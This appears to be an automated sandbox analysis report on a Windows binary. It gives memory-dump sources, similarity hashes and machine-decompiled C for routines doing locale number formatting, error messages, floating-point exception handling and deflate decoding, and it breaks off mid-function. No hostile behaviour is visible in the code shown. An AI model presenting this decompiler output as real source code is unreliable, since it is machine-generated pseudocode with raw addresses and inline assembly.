                                                                                                                0x00ee1c59
                                                                                                                0x00ee1c63
                                                                                                                0x00ee1c6b
                                                                                                                0x00ee1c6b
                                                                                                                0x00ee1c3b
                                                                                                                0x00ee1c16
                                                                                                                0x00ee1c19
                                                                                                                0x00ee1c1f
                                                                                                                0x00ee1c1f
                                                                                                                0x00ee1c05
                                                                                                                0x00ee1c0b
                                                                                                                0x00ee1c0b

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e7e0e421c2b8001334d4763317abc36d2300350b4c4dfe9ee30069852d9f412
                                                                                                                • Instruction ID: d92fe95f92cd932f3d52408286b73b3a44db1d7921b5a41658c15998f2f7ad55
                                                                                                                • Opcode Fuzzy Hash: 4e7e0e421c2b8001334d4763317abc36d2300350b4c4dfe9ee30069852d9f412
                                                                                                                • Instruction Fuzzy Hash: C2021A71E002599BDF14CFA9C8806ADB7F5FF88314F2552AAE919F7285D731AE41CB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF8F6, Relevance: 3.0, APIs: 2, Instructions: 46COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00ECF8F6(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xef1500 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xf23318 = _v304;
					 *0xf2331a = 0;
					 *0xef1500 = 0xf23318;
				}
				E00EC661E(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xef14f0, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                                                                                                                0x00ecf90e
                                                                                                                0x00ecf91c
                                                                                                                0x00ecf929
                                                                                                                0x00ecf931
                                                                                                                0x00ecf937
                                                                                                                0x00ecf937
                                                                                                                0x00ecf94d
                                                                                                                0x00ecf952
                                                                                                                0x00ecf957
                                                                                                                0x00ecf961
                                                                                                                0x00ecf96b
                                                                                                                0x00ecf973
                                                                                                                0x00ecf97e

                                                                                                                APIs
                                                                                                                • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00ECF91C
                                                                                                                • GetNumberFormatW.KERNEL32 ref: 00ECF96B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FormatInfoLocaleNumber
                                                                                                                • String ID:
                                                                                                                • API String ID: 2169056816-0
                                                                                                                • Opcode ID: f093621d1fb5390bf12d33cc2a8364299225e1ca5a78c8ce0183177fc07f39c6
                                                                                                                • Instruction ID: 841297d30c0a48de83a5902f65705c743c2b289aedd35a98fc13a9ada530a515
                                                                                                                • Opcode Fuzzy Hash: f093621d1fb5390bf12d33cc2a8364299225e1ca5a78c8ce0183177fc07f39c6
                                                                                                                • Instruction Fuzzy Hash: 6A018C7510034CBADB20CFA59C45FAA77B8EF88751F005026BA04AB151E3319A2987A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EC1892, Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00EC1892(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}





                                                                                                                0x00ec1892
                                                                                                                0x00ec189a
                                                                                                                0x00000000
                                                                                                                0x00ec18c1
                                                                                                                0x00ec18b3
                                                                                                                0x00ec18bb
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00EC7559,?,00000200), ref: 00EC1892
                                                                                                                • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00EC18B3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFormatLastMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 3479602957-0
                                                                                                                • Opcode ID: beb769266407a861979b4e5c3bb96cdb6f8d6a04eacced1f1c67210332bb230c
                                                                                                                • Instruction ID: a89fdf7da52569e6eab98e8160c60735f9157afded8afddf4edd6f9dd255fb18
                                                                                                                • Opcode Fuzzy Hash: beb769266407a861979b4e5c3bb96cdb6f8d6a04eacced1f1c67210332bb230c
                                                                                                                • Instruction Fuzzy Hash: 0DD0A7313CC305BEEF110A719D45F2637917706B91F10D9047342FC0D1C57180199714
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EE6224, Relevance: 1.8, APIs: 1, Instructions: 269COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00EE6224(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E00EE3B82(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E00EE3AE8(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}























                                                                                                                0x00ee6232
                                                                                                                0x00ee6239
                                                                                                                0x00ee623e
                                                                                                                0x00ee6244
                                                                                                                0x00ee6247
                                                                                                                0x00ee624d
                                                                                                                0x00ee6252
                                                                                                                0x00ee6257
                                                                                                                0x00ee6257
                                                                                                                0x00ee625d
                                                                                                                0x00ee6262
                                                                                                                0x00ee6267
                                                                                                                0x00ee6267
                                                                                                                0x00ee626e
                                                                                                                0x00ee6273
                                                                                                                0x00ee6278
                                                                                                                0x00ee6278
                                                                                                                0x00ee627f
                                                                                                                0x00ee6284
                                                                                                                0x00ee6289
                                                                                                                0x00ee6289
                                                                                                                0x00ee6290
                                                                                                                0x00ee6295
                                                                                                                0x00ee629a
                                                                                                                0x00ee629a
                                                                                                                0x00ee62a2
                                                                                                                0x00ee62b2
                                                                                                                0x00ee62c4
                                                                                                                0x00ee62d6
                                                                                                                0x00ee62e9
                                                                                                                0x00ee62fb
                                                                                                                0x00ee6303
                                                                                                                0x00ee6308
                                                                                                                0x00ee630d
                                                                                                                0x00ee630d
                                                                                                                0x00ee6314
                                                                                                                0x00ee6319
                                                                                                                0x00ee6319
                                                                                                                0x00ee6320
                                                                                                                0x00ee6325
                                                                                                                0x00ee6325
                                                                                                                0x00ee632c
                                                                                                                0x00ee6331
                                                                                                                0x00ee6331
                                                                                                                0x00ee6338
                                                                                                                0x00ee633d
                                                                                                                0x00ee633d
                                                                                                                0x00ee6347
                                                                                                                0x00ee6349
                                                                                                                0x00ee6383
                                                                                                                0x00ee634b
                                                                                                                0x00ee6350
                                                                                                                0x00ee6374
                                                                                                                0x00ee637c
                                                                                                                0x00ee6370
                                                                                                                0x00ee6370
                                                                                                                0x00ee6386
                                                                                                                0x00ee638d
                                                                                                                0x00ee638f
                                                                                                                0x00ee63b1
                                                                                                                0x00ee63b9
                                                                                                                0x00ee63bc
                                                                                                                0x00ee63bc
                                                                                                                0x00ee63be
                                                                                                                0x00ee63be
                                                                                                                0x00ee63c9
                                                                                                                0x00ee63cf
                                                                                                                0x00ee63d4
                                                                                                                0x00ee63db
                                                                                                                0x00ee6415
                                                                                                                0x00ee6420
                                                                                                                0x00ee6426
                                                                                                                0x00ee6429
                                                                                                                0x00ee642c
                                                                                                                0x00ee6438
                                                                                                                0x00ee6440
                                                                                                                0x00ee63dd
                                                                                                                0x00ee63e0
                                                                                                                0x00ee63ec
                                                                                                                0x00ee63f2
                                                                                                                0x00ee63f8
                                                                                                                0x00ee63fb
                                                                                                                0x00ee6404
                                                                                                                0x00ee6404
                                                                                                                0x00ee6443
                                                                                                                0x00ee6451
                                                                                                                0x00ee6457
                                                                                                                0x00ee645e
                                                                                                                0x00ee6460
                                                                                                                0x00ee6460
                                                                                                                0x00ee6467
                                                                                                                0x00ee6469
                                                                                                                0x00ee6469
                                                                                                                0x00ee6470
                                                                                                                0x00ee6472
                                                                                                                0x00ee6472
                                                                                                                0x00ee6479
                                                                                                                0x00ee647b
                                                                                                                0x00ee647b
                                                                                                                0x00ee6482
                                                                                                                0x00ee6484
                                                                                                                0x00ee6484
                                                                                                                0x00ee6491
                                                                                                                0x00ee6494
                                                                                                                0x00ee64cb
                                                                                                                0x00ee6496
                                                                                                                0x00ee6496
                                                                                                                0x00ee6499
                                                                                                                0x00ee64c4
                                                                                                                0x00ee64b9
                                                                                                                0x00ee64b9
                                                                                                                0x00ee64cd
                                                                                                                0x00ee64d5
                                                                                                                0x00ee64d8
                                                                                                                0x00ee64f7
                                                                                                                0x00ee64fc
                                                                                                                0x00ee64fc
                                                                                                                0x00ee64fe
                                                                                                                0x00ee6503
                                                                                                                0x00ee650f
                                                                                                                0x00ee6505
                                                                                                                0x00ee6508
                                                                                                                0x00ee6508
                                                                                                                0x00ee6514
                                                                                                                0x00ee6514
                                                                                                                0x00ee64da
                                                                                                                0x00ee64dd
                                                                                                                0x00ee64ec
                                                                                                                0x00000000
                                                                                                                0x00ee64ec
                                                                                                                0x00ee64df
                                                                                                                0x00ee64e2
                                                                                                                0x00ee64e4
                                                                                                                0x00ee64e4
                                                                                                                0x00000000
                                                                                                                0x00ee64e2
                                                                                                                0x00ee649b
                                                                                                                0x00ee649e
                                                                                                                0x00ee64b4
                                                                                                                0x00000000
                                                                                                                0x00ee64b4
                                                                                                                0x00ee64a3
                                                                                                                0x00ee64a5
                                                                                                                0x00ee64a5
                                                                                                                0x00ee64a3
                                                                                                                0x00000000
                                                                                                                0x00ee6494
                                                                                                                0x00ee6396
                                                                                                                0x00ee63a4
                                                                                                                0x00ee63ac
                                                                                                                0x00000000
                                                                                                                0x00ee63ac
                                                                                                                0x00ee639a
                                                                                                                0x00ee639f
                                                                                                                0x00ee639f
                                                                                                                0x00000000
                                                                                                                0x00ee639a
                                                                                                                0x00ee6357
                                                                                                                0x00ee6365
                                                                                                                0x00ee636d
                                                                                                                0x00000000
                                                                                                                0x00ee636d
                                                                                                                0x00ee635b
                                                                                                                0x00ee6360
                                                                                                                0x00ee6360
                                                                                                                0x00ee635b

                                                                                                                APIs
                                                                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EE621F,?,?,00000008,?,?,00EE5EBF,00000000), ref: 00EE6451
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                • Opcode ID: f6e48e5b1b4ee6edb265a534efcbcb5b35ae97e5a66328be4594726be4638771
                                                                                                                • Instruction ID: 50b4227ed560e0f420b47b33364c9b857cf0b8e2fbfaad0ae4b10c9b4c435fa1
                                                                                                                • Opcode Fuzzy Hash: f6e48e5b1b4ee6edb265a534efcbcb5b35ae97e5a66328be4594726be4638771
                                                                                                                • Instruction Fuzzy Hash: 59B17C31210648DFD715CF29C48ABA87BE0FF553A8F259658E8A9DF2E1C335E991CB40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECB2CF, Relevance: 1.7, Strings: 1, Instructions: 486COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E00ECB2CF() {
				char _v1280;
				signed int _v1284;
				int _v1288;
				intOrPtr _v1292;
				int _v1296;
				signed int _v1300;
				signed int _v1304;
				signed int _v1308;
				signed int _v1312;
				signed int _v1316;
				int _v1320;
				char _v1324;
				signed int _v1328;
				intOrPtr _v1336;
				signed int _v1340;
				void* __edi;
				signed int _t111;
				signed int _t121;
				signed int _t123;
				signed int _t130;
				signed int _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				signed char* _t144;
				signed int _t150;
				signed int _t155;
				signed char* _t158;
				signed int _t161;
				signed int _t162;
				signed int _t165;
				signed char* _t166;
				signed int _t169;
				signed int _t170;
				signed int _t173;
				signed char* _t174;
				signed int _t179;
				signed int _t182;
				intOrPtr _t186;
				signed int _t187;
				signed int _t189;
				signed char _t194;
				int _t195;
				signed int _t197;
				signed int _t198;
				int _t201;
				signed char _t210;
				signed char _t215;
				signed int _t217;
				signed char _t218;
				signed int _t221;
				signed int _t225;
				void* _t226;
				signed char* _t227;
				void* _t228;
				signed int _t229;
				signed int _t230;
				signed int _t234;
				signed int _t239;
				signed int _t243;
				signed int _t244;
				signed char _t245;
				signed int _t246;
				signed int _t247;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int* _t256;
				signed int _t260;

				_v1320 = 0;
				_v1288 = 0;
				_t110 = E00ED4440(_t226,  &_v1280, 0, 0x500);
				_t250 =  *0xf0c814; // 0x0
				_t256 =  &(( &_v1320)[3]);
				_t243 =  *0xf0c818; // 0x2
				_t221 =  *0xf0b5a0; // 0x116
				_t227 =  *0xf0b598; // 0x31dc72d
				while(_t243 < 5) {
					_t221 = _t221 + 0xffffffff;
					__eflags = _t221;
					 *0xf0b5a0 = _t221;
					asm("adc dword [0xf0b5a4], 0xffffffff");
					if(__eflags < 0) {
						L5:
						_t111 = E00ECA1D6(_t110, _t221);
						_t221 =  *0xf0b5a0; // 0x116
						_t227 =  *0xf0b598; // 0x31dc72d
						L6:
						__eflags = _t111 - 0xffffffff;
						if(_t111 == 0xffffffff) {
							__eflags = _t243;
							if(_t243 >= 0) {
								break;
							}
							L11:
							_t182 = 1;
							L118:
							return _t182;
						} else {
							_t110 = _t111 << _t243;
							_t250 = _t250 | _t111 << _t243;
							_t243 = _t243 + 8;
							__eflags = _t243;
							continue;
						}
					}
					if(__eflags > 0) {
						L4:
						_t111 =  *_t227 & 0x000000ff;
						_t227 =  &(_t227[1]);
						 *0xf0b598 = _t227;
						goto L6;
					}
					__eflags = _t221;
					if(_t221 < 0) {
						goto L5;
					}
					goto L4;
				}
				_t251 = _t250 >> 5;
				_t114 = (_t250 & 0x0000001f) + 0x101;
				_t244 = _t243 - 5;
				_v1300 = (_t250 & 0x0000001f) + 0x101;
				while(_t244 < 5) {
					_t221 = _t221 + 0xffffffff;
					__eflags = _t221;
					 *0xf0b5a0 = _t221;
					asm("adc dword [0xf0b5a4], 0xffffffff");
					if(__eflags < 0) {
						L16:
						_t114 = E00ECA1D6(_t114, _t221);
						_t221 =  *0xf0b5a0; // 0x116
						_t227 =  *0xf0b598; // 0x31dc72d
						L17:
						__eflags = _t114 - 0xffffffff;
						if(_t114 == 0xffffffff) {
							__eflags = _t244;
							if(_t244 < 0) {
								goto L11;
							}
							L22:
							_t245 = _t244 - 5;
							_t252 = _t251 >> 5;
							_t186 = (_t251 & 0x0000001f) + 1;
							_v1292 = _t186;
							if(_t245 >= 4) {
								L33:
								_t246 = _t245 - 4;
								_t253 = _t252 >> 4;
								_t118 = (_t252 & 0x0000000f) + 4;
								_v1296 = _t118;
								if(_v1300 > 0x120 || _t186 > 0x20) {
									__eflags = 1;
									return 1;
								} else {
									_t187 = 0;
									_v1304 = 0;
									if(_t118 != 0) {
										goto L51;
										do {
											while(1) {
												L51:
												__eflags = _t246 - 3;
												if(_t246 >= 3) {
													break;
												}
												_t221 = _t221 + 0xffffffff;
												__eflags = _t221;
												 *0xf0b5a0 = _t221;
												asm("adc dword [0xf0b5a4], 0xffffffff");
												if(__eflags < 0) {
													L48:
													_t121 = E00ECA1D6(_t118, _t221);
													_t221 =  *0xf0b5a0; // 0x116
													_t227 =  *0xf0b598; // 0x31dc72d
													L49:
													__eflags = _t121 - 0xffffffff;
													if(_t121 == 0xffffffff) {
														__eflags = _t246;
														if(_t246 < 0) {
															goto L11;
														}
														goto L54;
													}
													_t118 = _t121 << _t246;
													_t253 = _t253 | _t121 << _t246;
													_t246 = _t246 + 8;
													__eflags = _t246;
													continue;
												}
												if(__eflags > 0) {
													L47:
													_t121 =  *_t227 & 0x000000ff;
													_t227 =  &(_t227[1]);
													 *0xf0b598 = _t227;
													goto L49;
												}
												__eflags = _t221;
												if(_t221 < 0) {
													goto L48;
												}
												goto L47;
											}
											L54:
											_t189 = _t253 & 0x00000007;
											_t253 = _t253 >> 3;
											_t246 = _t246 - 3;
											_t118 =  *(0xee8058 + _v1304 * 4);
											 *(_t256 + 0x38 +  *(0xee8058 + _v1304 * 4) * 4) = _t189;
											_t187 = _v1304 + 1;
											_v1304 = _t187;
											__eflags = _t187 - _v1296;
										} while (_t187 < _v1296);
										L37:
										if(_t187 < 0x13) {
											goto L36;
										}
										_v1308 = 7;
										_t228 = E00ECA6AE( &_v1280, 0x13, 0x13, 0, 0,  &_v1320,  &_v1308);
										_t182 = 1;
										if(_v1336 == 0) {
											_t228 = 1;
										}
										if(_t228 == 0) {
											_t129 = _v1300 + _v1292;
											_v1304 = _v1300 + _v1292;
											_t229 = 0;
											_v1284 = (_t182 << _v1308) - 1;
											_t225 =  *0xf0b5a0; // 0x116
											_v1296 = 0;
											_v1312 = 0;
											goto L64;
											do {
												while(1) {
													L64:
													__eflags = _t246 - _v1308;
													if(_t246 >= _v1308) {
														break;
													}
													_t225 = _t225 + 0xffffffff;
													__eflags = _t225;
													 *0xf0b5a0 = _t225;
													asm("adc dword [0xf0b5a4], 0xffffffff");
													if(__eflags < 0) {
														L61:
														_t130 = E00ECA1D6(_t129, _t225);
														_t225 =  *0xf0b5a0; // 0x116
														L62:
														__eflags = _t130 - 0xffffffff;
														if(_t130 == 0xffffffff) {
															__eflags = _t246;
															if(_t246 < 0) {
																L126:
																_t131 = _v1320;
																__eflags = _t131;
																if(_t131 != 0) {
																	E00ECAB49(_t131);
																}
																__eflags = _t229;
																if(_t229 != 0) {
																	_push(_t229);
																	L117:
																	E00ECAB49();
																}
																goto L118;
															}
															L67:
															_t135 = _v1284 & _t253;
															_t194 =  *(_v1320 + 1 + _t135 * 8) & 0x000000ff;
															_t253 = _t253 >> _t194;
															_t246 = _t246 - _t194;
															_t195 = _v1320;
															_t136 =  *(_t195 + 4 + _t135 * 8) & 0x0000ffff;
															__eflags = _t136 - 0x10;
															if(__eflags >= 0) {
																if(__eflags != 0) {
																	__eflags = _t136 - 0x11;
																	if(_t136 != 0x11) {
																		while(1) {
																			__eflags = _t246 - 7;
																			if(_t246 >= 7) {
																				break;
																			}
																			_t225 = _t225 + 0xffffffff;
																			__eflags = _t225;
																			 *0xf0b5a0 = _t225;
																			asm("adc dword [0xf0b5a4], 0xffffffff");
																			if(__eflags < 0) {
																				L101:
																				_t137 = E00ECA1D6(_t136, _t225);
																				_t225 =  *0xf0b5a0; // 0x116
																				L102:
																				__eflags = _t137 - 0xffffffff;
																				if(_t137 == 0xffffffff) {
																					__eflags = _t246;
																					if(_t246 < 0) {
																						goto L126;
																					}
																					L107:
																					_t230 = _v1312;
																					_t197 = _t253 & 0x0000007f;
																					_t253 = _t253 >> 7;
																					_t198 = _t197 + 0xb;
																					_t246 = _t246 - 7;
																					_t138 = _t230 + _t198;
																					_v1316 = _t138;
																					__eflags = _t138 - _v1304;
																					if(_t138 > _v1304) {
																						_t247 = _t182;
																						L131:
																						_push(_v1320);
																						L132:
																						E00ECAB49();
																						L133:
																						return _t247;
																					}
																					__eflags = 0;
																					memset( &_v1280 + _t230 * 4, 0, _t198 << 2);
																					_t256 =  &(_t256[3]);
																					_t129 = _v1316;
																					L109:
																					_t229 = 0;
																					__eflags = 0;
																					_v1296 = 0;
																					goto L110;
																				}
																				_t136 = _t137 << _t246;
																				_t253 = _t253 | _t137 << _t246;
																				_t246 = _t246 + 8;
																				__eflags = _t246;
																				continue;
																			}
																			if(__eflags > 0) {
																				L100:
																				_t158 =  *0xf0b598; // 0x31dc72d
																				 *0xf0b598 =  &(_t158[1]);
																				_t137 =  *_t158 & 0x000000ff;
																				goto L102;
																			}
																			__eflags = _t225 - _t229;
																			if(_t225 < _t229) {
																				goto L101;
																			}
																			goto L100;
																		}
																		goto L107;
																	}
																	__eflags = _t246 - 3;
																	if(_t246 >= 3) {
																		L95:
																		_t161 = _t253 & 0x00000007;
																		_t253 = _t253 >> 3;
																		_t162 = _t161 + 3;
																		_t246 = _t246 - 3;
																		_t234 = _v1312 + _t162;
																		_v1316 = _t234;
																		__eflags = _t234 - _v1304;
